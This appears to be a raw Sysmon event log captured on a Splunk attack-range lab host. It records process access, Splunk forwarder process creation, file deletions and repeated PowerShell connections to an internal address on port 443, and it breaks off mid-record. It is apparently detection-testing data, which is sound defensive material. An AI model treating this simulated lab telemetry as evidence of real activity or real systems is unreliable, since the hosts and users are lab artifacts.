18:13:28.952{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084916Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:13:28.952{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084915Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:28.952{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084914Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:13:28.952{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4EC8-613A-4D90-03000000C801}5764C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084913Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:28.952{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4EC8-613A-4D90-03000000C801}5764C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084912Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:28.939{B81B27B7-4EC8-613A-4D90-03000000C801}5764C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000035084911Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:28.253{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4EC8-613A-4C90-03000000C801}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084910Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:28.253{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000035084909Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:28.253{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084908Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:28.253{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084907Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:13:28.253{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084906Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:28.253{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-4EC8-613A-4C90-03000000C801}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084905Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:28.253{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4EC8-613A-4C90-03000000C801}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084904Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:28.238{B81B27B7-4EC8-613A-4C90-03000000C801}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035084903Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:52.407{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56670-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035084902Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:52.176{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56669-false10.0.1.12-8000- 23542300x800000000000000035084923Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:29.252{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E95CF0CB5A1DEBFE5687772FBC415104,SHA256=D1F5782D1F9A4C2349B01BA58521847FD9E9443C84546D50DB0312D46A774479,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084922Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:29.252{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CAA73585D093A0AB854CCCE87B7D0296,SHA256=528F00CE51100719CA40460F6616B574098A9CD3F49227C37BB94E2195C3AD5D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084921Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:29.099{B81B27B7-4EC8-613A-4D90-03000000C801}57645280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035084924Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:30.017{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69CA66F4CEB6F24AD9589093B2D0CD9D,SHA256=74AFCDEAEBBDA408884768CD353152D1E04B4BCA8EFE24240CB1392259524825,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084927Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:31.950{B81B27B7-2BC4-612D-7CF4-01000000C801}4056ATTACKRANGE\REED_SCHMIDTC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\reed_schmidt\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\4056.xml~RF7181fa87.TMPMD5=7FFA55FF6AC84742FC67B49B83BE3F12,SHA256=786CB96E30E42C16784374E9E5E14298976752E69CFAAF7FCB2ED016D9E3B6BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084926Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:31.415{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=DCA9C41959DACFEE2B007A1FC0D845CC,SHA256=8C9CFB03E9D6FF7555DB9A1CD3C8EA47532C9B8015C28C078D8CCF23B12D59AA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084925Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:13:31.050{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2C7001E9EFED9E77C3C28DEC4959882,SHA256=CC3144A40089FCD22607DDC148BE80232C8E132BB70C9EB6B1A5F0708F807A14,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084929Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:56.419{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56671-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084928Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:32.081{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED17D758099B5EE251AE02B0DD144854,SHA256=A2E7645D3DD27B369D7E55D3B2BA37D6E9741F665C6DB405F1DC1318D1A73784,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084930Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:33.095{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5E62F8509BCEF8C5A283F86513C480B,SHA256=9D236832055667D6AFA40ED8BF8DA2E163AC1E66DF9142B83E6DBBD2FFE92434,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
354300x800000000000000035084932Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:58.117{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56672-false10.0.1.12-8000- 23542300x800000000000000035084931Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:34.112{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37863EFC8088EF678F87BB8C90346F0D,SHA256=BA114BD5732F8FA99B17134825E24D7730A791AA6650C450E6BC55E0296611C7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084933Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:35.131{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C525C372A710B2E788D8C630EF00D7C,SHA256=1F54CD9F25E9A45F578567AB75B9E8BE8A4708942E6DFCB6D8E0FE0EB0049ABC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084936Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:36.630{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=CEAF56F09C7BD19EABA3E01B1AE0AE0C,SHA256=2347302D0C0FB9C648679B2B0BDC58064F480947D7DE0AE2E984015AB2FD1014,IMPHASH=00000000000000000000000000000000falsefalse - 
insufficient disk space 23542300x800000000000000035084935Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:36.409{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=6DEAA4B39A23E9F17DBFFCB0DE7E315F,SHA256=138FEADE5EE65FE4036DF3E2196C9A44183E9F5C8816E15F4142035AD893F64C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084934Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:36.162{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B904589AC14C686B852A74965D3436EA,SHA256=11A2C72F03FCEC116FD97F44D55B6D51C8345E18CD71B20B5019D81968C37148,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084938Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:01.431{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56673-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084937Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:37.211{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=729FFB3411DF8A84244DCFCD54875F91,SHA256=F5F8A1137CC2D720812AFAAF4086BC440BDC62A65C4B5F1E2CE0FFCFEAE43A59,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000035084939Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:38.245{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F45B5768908D8E4EFB698CD788B2D5F2,SHA256=A9C46FCF2FF4850D38D2B90B8DBEACDEE0D5A68884FA62C1860D40AD72FDE92D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084941Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:04.128{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56674-false10.0.1.12-8000- 23542300x800000000000000035084940Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:39.265{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CAE426CA78F2F3CCEF3130BC8A1079A3,SHA256=642F4706FBC9186493508986FC38F0FAA2C8E373D72194F176300BABE62865CB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084943Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:40.448{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=2DC20BB5B3863BA489687CAF77FF6259,SHA256=A9AC9AD419935E47BAAA6A548B5278161BE1EB1163691ACCEEC4AA9EDE355449,IMPHASH=00000000000000000000000000000000falsefalse - 
insufficient disk space 23542300x800000000000000035084942Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:40.280{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F20B7A289698AC35C3635F50F7A87A77,SHA256=31DEA0EFD07D444DC78702A47BCD28C4AC52FF53A90A54C0454BC687EC7BAB69,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084945Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:05.455{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56675-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084944Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:41.295{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 